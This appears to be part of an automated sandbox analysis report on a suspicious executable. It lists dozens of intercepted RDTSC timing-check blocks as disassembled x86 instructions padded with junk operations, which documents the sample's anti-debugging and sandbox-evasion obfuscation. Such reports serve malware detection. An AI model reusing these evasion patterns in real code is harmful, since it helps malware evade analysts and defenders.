Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116A19E second address: 1151D8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF08D33350h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FBF08D33355h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007FBF08D33350h 0x00000019 nop 0x0000001a mov dword ptr [ebp+122D346Dh], esi 0x00000020 call dword ptr [ebp+122D332Eh] 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push edi 0x0000002a pop edi 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116A619 second address: 116A61F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116A61F second address: 116A625 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116A625 second address: 116A629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116A629 second address: 116A64E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF08D33354h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007FBF08D33346h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116A64E second address: 116A654 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116AC00 second address: 116AC05 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116AF5C second address: 116AF62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116AF62 second address: 116AF66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116AF66 second address: 116AF6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116AF6A second address: 116AFBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnp 00007FBF08D33357h 0x0000000f jmp 00007FBF08D33351h 0x00000014 nop 0x00000015 sub ecx, 5475B3BAh 0x0000001b push 0000001Eh 0x0000001d xor edx, dword ptr [ebp+122D27C8h] 0x00000023 mov ecx, dword ptr [ebp+122D29F5h] 0x00000029 nop 0x0000002a push edx 0x0000002b jmp 00007FBF08D33351h 0x00000030 pop edx 0x00000031 push eax 0x00000032 pushad 0x00000033 push eax 0x00000034 push ebx 0x00000035 pop ebx 0x00000036 pop eax 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116B111 second address: 116B12D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF09325AC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116B25A second address: 116B25E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116B3AC second address: 116B3B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116B3B0 second address: 116B3B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116B3B4 second address: 116B3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116B3BA second address: 116B3C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116B3C1 second address: 116B3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a add di, ECE3h 0x0000000f lea eax, dword ptr [ebp+1247FEE6h] 0x00000015 jmp 00007FBF09325AC1h 0x0000001a nop 0x0000001b push eax 0x0000001c push edx 0x0000001d jp 00007FBF09325AB8h 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116B3F2 second address: 116B40C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBF08D3334Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FBF08D33346h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116B40C second address: 116B410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B1ABE second address: 11B1AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B1C53 second address: 11B1C5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B1C5B second address: 11B1C61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B1C61 second address: 11B1C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1132270 second address: 113228B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBF08D33353h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B1DBB second address: 11B1DCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FBF09325AB6h 0x00000009 jbe 00007FBF09325AB6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B20B0 second address: 11B20B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B20B8 second address: 11B20C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B23AD second address: 11B23C3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FBF08D3334Bh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4A52 second address: 11B4A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B7C5A second address: 11B7C5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B7C5E second address: 11B7C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jnc 00007FBF09325AB6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B7C70 second address: 11B7C8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF08D33356h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B773C second address: 11B7746 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBF09325AB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B7746 second address: 11B774F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BBE74 second address: 11BBEA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FBF09325AC1h 0x0000000c jmp 00007FBF09325AC8h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BBEA6 second address: 11BBEC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jg 00007FBF08D3334Ch 0x0000000c jnl 00007FBF08D33346h 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007FBF08D33346h 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BF954 second address: 11BF95A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BF95A second address: 11BF97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FBF08D33359h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BF97A second address: 11BF98F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF09325ABCh 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BFC42 second address: 11BFC48 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BFC48 second address: 11BFC5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FBF09325AB6h 0x0000000e jp 00007FBF09325AB6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BFF15 second address: 11BFF1B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C01DD second address: 11C01F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007FBF09325AB6h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C01F0 second address: 11C01FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FBF08D33346h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C01FC second address: 11C0200 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C7985 second address: 11C7989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C6110 second address: 11C611E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FBF09325AC2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C611E second address: 11C612E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBF08D33346h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C62A4 second address: 11C62B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBF09325ABFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C6990 second address: 11C6996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116AE1B second address: 116AE56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF09325AC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub edi, dword ptr [ebp+122D26DFh] 0x00000010 push ecx 0x00000011 sbb edx, 7D917F00h 0x00000017 pop edi 0x00000018 push 00000004h 0x0000001a movzx ecx, ax 0x0000001d nop 0x0000001e push esi 0x0000001f push edi 0x00000020 pushad 0x00000021 popad 0x00000022 pop edi 0x00000023 pop esi 0x00000024 push eax 0x00000025 jnl 00007FBF09325AC0h 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C6C81 second address: 11C6C87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C6C87 second address: 11C6C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C6C8D second address: 11C6C93 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CD258 second address: 11CD272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007FBF09325AB6h 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jl 00007FBF09325AB6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CD272 second address: 11CD292 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF08D3334Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push edx 0x0000000d jp 00007FBF08D3334Ah 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CD292 second address: 11CD29C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FBF09325AB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CD41E second address: 11CD42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FBF08D33346h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CD849 second address: 11CD84D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CD84D second address: 11CD866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FBF08D33350h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CDAEB second address: 11CDB14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c js 00007FBF09325AB6h 0x00000012 jmp 00007FBF09325AC3h 0x00000017 pop eax 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CDE25 second address: 11CDE4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007FBF08D33346h 0x0000000d jmp 00007FBF08D33351h 0x00000012 jnc 00007FBF08D33346h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CE0B6 second address: 11CE0BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CEDD6 second address: 11CEDE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBF08D33346h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FBF08D33346h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D8975 second address: 11D897A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D7B35 second address: 11D7B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF08D33350h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D7B4A second address: 11D7B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D8052 second address: 11D807F instructions: 0x00000000 rdtsc 0x00000002 js 00007FBF08D33346h 0x00000008 jp 00007FBF08D33346h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 ja 00007FBF08D33359h 0x00000016 jmp 00007FBF08D33353h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D807F second address: 11D8085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D8085 second address: 11D8092 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBF08D33346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D8092 second address: 11D80C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FBF09325ADCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D80C6 second address: 11D80CF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D83C6 second address: 11D83D4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 js 00007FBF09325ABEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E0835 second address: 11E0839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E0839 second address: 11E083D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DE9F7 second address: 11DE9FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DEE5A second address: 11DEE67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBF09325AB6h 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DF169 second address: 11DF16E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DF16E second address: 11DF190 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBF09325AC8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DF190 second address: 11DF194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DF194 second address: 11DF1BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF09325AC5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 jbe 00007FBF09325AB6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DF1BE second address: 11DF1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DF1C3 second address: 11DF1C8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DF4AC second address: 11DF4BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF08D3334Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DF4BC second address: 11DF4C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DF4C2 second address: 11DF4C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DF644 second address: 11DF66A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBF09325AC7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jl 00007FBF09325AB6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DF66A second address: 11DF66E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DF79C second address: 11DF7A1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E001F second address: 11E002B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E3B0A second address: 11E3B27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF09325ABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FBF09325ABCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1122D2E second address: 1122D41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 js 00007FBF08D33346h 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA525 second address: 11EA533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FBF09325AB6h 0x0000000a pop esi 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA533 second address: 11EA553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF08D33353h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FBF08D33346h 0x00000012 rdtsc
